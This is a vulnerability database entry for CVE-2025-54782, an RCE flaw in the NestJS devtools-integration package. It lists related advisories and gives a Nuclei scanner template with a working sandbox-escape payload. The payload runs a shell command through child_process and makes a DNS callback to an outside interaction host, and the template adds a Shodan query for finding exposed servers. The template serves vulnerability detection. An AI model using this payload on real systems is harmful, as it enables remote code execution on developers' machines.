| Reporter | Title | Published | Views | Family All 21 |
|---|---|---|---|---|
| Exploit for OS Command Injection in Nestjs Devtools-Integration | 6 Nov 202506:46 | – | githubexploit | |
| Exploit for CVE-2025-54782 | 25 Jul 202519:50 | – | githubexploit | |
| Exploit for Cross-Site Request Forgery (CSRF) in Nestjs Devtools-Integration | 22 Oct 202509:48 | – | githubexploit | |
| The vulnerability of the devtools-integration package of the Nest platform, which allows for the creation of scalable server applications in Node.js, enables a hacker to execute arbitrary code. | 28 Oct 202500:00 | – | bdu_fstec | |
| CVE-2025-54782 | 1 Aug 202517:27 | – | circl | |
| nest 命令注入漏洞 | 2 Aug 202500:00 | – | cnnvd | |
| CVE-2025-54782 | 1 Aug 202523:36 | – | cve | |
| CVE-2025-54782 @nestjs/devtools-integration's CSRF to Sandbox Escape Allows for RCE against JS Developers | 1 Aug 202523:36 | – | cvelist | |
| EUVD-2025-23413 | 3 Oct 202520:07 | – | euvd | |
| @nestjs/devtools-integration: CSRF to Sandbox Escape Allows for RCE against JS Developers | 1 Aug 202518:43 | – | github |
id: CVE-2025-54782
info:
name: NestJS DevTools Integration - Remote Code Execution
author: nukunga
severity: critical
description: |
Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox.
impact: |
Malicious websites visited by developers can execute arbitrary code on their local machine through the unprotected /inspector/graph/interact endpoint due to improper sandboxing.
remediation: This is fixed in version 0.2.1.
reference:
- https://socket.dev/blog/nestjs-rce-vuln
- https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7
- https://nvd.nist.gov/vuln/detail/CVE-2025-54782
classification:
cvss-metrics: CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
cvss-score: 9.4
cve-id: CVE-2025-54782
epss-score: 0.43921
epss-percentile: 0.98594
cwe-id: CWE-77,CWE-352,CWE-78
metadata:
verified: true
max-request: 1
shodan-query: "devtools.nestjs.com"
tags: cve,cve2025,nestjs,rce,sandbox,devtool,unauth,vkev,vuln
http:
- raw:
- |
POST /inspector/graph/interact HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
{"code":"(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('nslookup {{interactsh-url}}')}})()"}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: content_type
words:
- "application/plain"
- type: status
status:
- 200
# digest: 490a0046304402202b935ed4342c971bc1ddb8c932f0a73eec62693e520035a8be1ec2da8a4e1e0f02202abac0978b4d3f2da39fc319f986b31bf5471d8ee96eb086bef2d4b03a289b83:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation